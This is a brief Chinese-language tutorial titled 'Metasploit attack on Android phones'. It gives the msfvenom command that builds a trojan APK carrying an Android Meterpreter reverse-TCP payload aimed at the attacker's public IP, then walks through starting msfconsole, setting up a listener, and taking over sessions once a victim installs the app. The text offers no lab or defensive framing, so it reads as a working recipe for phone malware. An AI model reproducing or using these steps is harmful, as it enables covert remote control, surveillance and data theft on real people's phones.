Metasploit对安卓手机的攻击

时间:2021-12-30 09:09:46

首先要kali进行内网穿透,可参考http://www.cnblogs.com/sch01ar/p/7562954.html

首先生成一个apk木马

命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=外网IP LPORT=端口 R > /root/sch01ar.apk

Metasploit对安卓手机的攻击

启动msf,来监听反弹,命令为:msfconsole

然后设置一下payload,IP和端口

Metasploit对安卓手机的攻击

show options来查看一下

Metasploit对安卓手机的攻击

exploit开启监听

Metasploit对安卓手机的攻击

有人点击木马的话将会返回一个会话

Metasploit对安卓手机的攻击

输入命令sessions查看会话

Metasploit对安卓手机的攻击

输入命令sessions -i 2选择会话2,因为我这第一个会话断了,所以又开启了一个

Metasploit对安卓手机的攻击

输入命令help查看帮助,后面的操作就不再阐述了